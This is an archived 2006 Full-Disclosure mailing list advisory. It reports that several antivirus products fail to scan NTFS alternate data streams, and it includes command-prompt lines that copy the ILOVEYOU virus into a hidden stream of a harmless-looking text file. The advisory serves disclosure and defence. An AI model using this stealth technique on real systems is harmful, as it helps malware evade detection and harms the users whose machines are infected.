lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun Jun  4 19:05:51 2006
From: joxeankoret at yahoo.es (Joxean Koret)
Subject: Multiple Vendor NTFS Data Stream Malware Stealth
	Technique

Hi to all!

	Because it isn't a new problem and is well known by virus and spyware
writters I decide to release to the public now. Full disclosure.

	Attached goes a simple paper that describes this "very-advanced"
technique that was applicable at 1993 and is currently applicable.

Regards,
Joxean Koret


Disclaimer
----------

The information in this advisory and any of its 
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory. 

---------------------------------------------------------------------------

Contact
-------

        Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

-------------- next part --------------
Multiple Vendor NTFS Data Stream Malware Stealth Technique
----------------------------------------------------------

Affected product/vendors:
	
	Panda Software. All products.
	ClamWin. All versions.
	Norman Virus Control. All versions.
	AVG Antivirus.

Non-affected vendors:
	
	Mcaffe / Computer Associates
	Avira Antivir PersonalEdition Classic

Technique Description
----------------------

	It isn't in any way a new technique, the first proof of concept of hidding malware into an NTFS 
data stream was published at 2000. Apparently the technique wasn't so popular and due to this fact 
the 75% (or more) of the anti-virus industry have been ignore it.

	The technique is as simple as follow. Download a virus file, even an old one. Call it, in example,
'iloveyou.vbs'. Next, go to a command prompt:

------------------------------------------------------------------------------------------------------
C:\>echo I'm an inocent file. > file.txt

C:\>type file.txt
I'm an inocent file.

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8475-DDEF

 Directory of C:\

06/03/2006  01:10       <DIR>          Documents and Settings
03/06/2006  05:10                   23 file.txt
03/06/2006  04:52               10.320 iloveyou.txt
03/06/2006  04:52               10.320 iloveyou.vbs
26/12/2005  00:51       <DIR>          Inetpub
03/06/2006  05:09       <DIR>          Program Files
29/05/2006  23:24                   12 test1.vbs
03/06/2006  05:06       <DIR>          WINNT
               4 File(s)         20.675 bytes
               4 Dir(s)   2.539.368.448 bytes free

C:\>type iloveyou.vbs > file.txt:virus.vbs

C:\>type file.txt
I'm an inocent file.

C:\>more < file.txt:virus.vbs
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@...l.com / @GRAMMERSoft Group /
(...)
---More---
------------------------------------------------------------------------------------------------------


	Now, try scanning your system with your preferred vulnerable antivirus product. The first file in a
normal data stream 'iloveyou.vbs' will (surely) be detected but not the copy of it stored in an alternate
data stream of the apparently innocent file c:\file.txt.


Disclaimer
----------

The information in this advisory and any of its 
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory. 

---------------------------------------------------------------------------

Contact
-------

        Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
	digitalmente
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060604/803b8c93/attachment.bin

Powered by blists - more mailing lists